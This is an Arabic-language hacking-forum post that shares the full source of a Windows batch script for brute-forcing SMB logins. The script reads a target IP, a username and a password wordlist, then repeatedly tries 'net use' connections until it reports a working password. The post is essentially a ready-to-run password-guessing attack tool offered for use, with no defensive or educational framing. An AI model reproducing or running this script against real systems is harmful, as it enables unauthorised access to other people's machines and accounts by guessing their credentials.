تقييم الموضوع :
  • 0 أصوات - بمعدل 0
  • 1
  • 2
  • 3
  • 4
  • 5
WINDOWS BATCH SMB-Bruteforce source code [BATCH SHELL]
#1
Lightning 
السلام عليكم ورحمت الله وبركاته
 
 
@echo off
title SMB Bruteforce - by Ebola Man
color A
echo.
set /p ip="Enter IP Address: "
set /p user="Enter Username: "
set /p wordlist="Enter Password List: "

set /a count=1
for /f %%a in (%wordlist%) do (
  set pass=%%a
  call :attempt
)
echo Password not Found :(
pause
exit

:success
echo.
echo Password Found! %pass%
net use \\%ip% /d /y >nul 2>&1
pause
exit

:attempt
net use \\%ip% /user:%user% %pass% >nul 2>&1
echo [ATTEMPT %count%] [%pass%]
set /a count=%count%+1
if %errorlevel% EQU 0 goto success
source : original authorConfused
إقتباس :
أعضاء أعجبوا بهذه المشاركة : sitifis


الردود في هذا الموضوع
WINDOWS BATCH SMB-Bruteforce source code [BATCH SHELL] - بواسطة [email protected] - 17-05-2024, 12:35 PM

التنقل السريع :


يقوم بقرائة الموضوع: بالاضافة الى ( 1 ) ضيف كريم